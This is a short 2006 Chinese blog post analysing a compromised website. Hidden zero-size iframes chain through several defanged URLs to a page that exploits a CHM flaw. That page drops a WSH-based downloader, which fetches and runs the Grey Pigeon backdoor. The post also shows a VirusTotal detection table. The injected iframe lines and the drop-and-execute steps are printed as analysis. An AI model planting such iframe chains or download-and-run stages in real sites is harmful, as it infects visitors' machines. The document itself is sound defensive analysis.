一个自动下载灰鸽子的网站

endurer　原创

2006-05-04　第1版

某网站被加入：

 

---

 

＜iframe src="hxxp://95762.***512j.com/" width="0" height="0"＞

 

---

 

hxxp://95762.***512j.com/index的内容为:

 

---

 

＜iframe src="hxxp://www.***kkkshop.com/images/index.htm" width="0" height="0"＞＜/iframe＞

 

---

 

hxxp://www.***kkkshop.com/images/index.htm的内容为:

 

---

 

＜iframe src="hxxp://www.***kkkshop.com/cnshop/img/index.htm" width="0" height="0"＞＜/iframe＞

 

---

 

hxxp://www.***kkkshop.com/cnshop/img/index.htm的内容为escope()的代码，利用CHM漏洞下载young.gif和young.css两个文件。

young.gif　利用WSH在IE临时缓存中寻找young.css，复制为C:/arcldrer.exe并运行；创建c:/cmd.bat来清除痕迹。

Complete scanning result of "young.gif", received in VirusTotal at 05.04.2006, 04:48:34 (CET).

Antivirus	Version	Update	Result
AntiVir	6.34.0.24	04.20.2006	no virus found
Avast	4.6.695.0	05.03.2006	no virus found
AVG	386	05.04.2006	no virus found
Avira	6.34.1.58	05.03.2006	no virus found
BitDefender	7.2	05.04.2006	Exploit.HTML.Mht.ABR
CAT-QuickHeal	8.00	05.03.2006	no virus found
ClamAV	devel-20060426	05.03.2006	no virus found
DrWeb	4.33	05.03.2006	Trojan.DownLoader.4263
eTrust-InoculateIT	23.71.146	05.04.2006	no virus found
eTrust-Vet	12.4.2191	05.02.2006	no virus found
Ewido	3.5	05.03.2006	no virus found
Fortinet	2.71.0.0	05.04.2006	no virus found
F-Prot	3.16c	05.03.2006	no virus found

young.css　是个PE格式的文件，会下载hxxp://www.***huayimei.com/bbs/Images/manage/zone.exe，存为C:/Program Files/zone.exe。这个是灰鸽子。

瑞星将young.css报为Trojan.DL.Delf.it。